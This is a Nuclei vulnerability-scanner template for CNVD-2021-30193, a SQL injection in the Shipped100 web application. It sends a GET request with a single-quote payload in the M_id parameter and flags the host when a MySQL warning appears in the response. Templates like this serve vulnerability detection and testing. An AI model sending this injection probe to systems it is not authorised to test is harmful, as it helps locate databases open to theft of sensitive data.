id: CNVD-2021-30193
info:
  name: Shipped100 - SQL Injection
  author: hacktifycs
  severity: critical
  description: An adversary can obtain sensitive information in the database through the vulnerability
  reference: https://github.com/mohamedabdelhady933/SeekerX/blob/6b486252955420dfb0c66158701f5f0626c639e5/CustomNucleiTemplates/shippedsqli.yaml#L5
  tags: 发货100

requests:
  - raw:
      - |
        GET /?M_id=1%27&type=product HTTP/1.1
        Host: {{Hostname}}
        Cache-Control: max-age=0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
        Accept-Language: en-US,en;q=0.9
        Connection: close
    
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "<b>Warning</b>"
          - "mysql"
        part: body
        condition: and

      - type: status
        status:
          - 200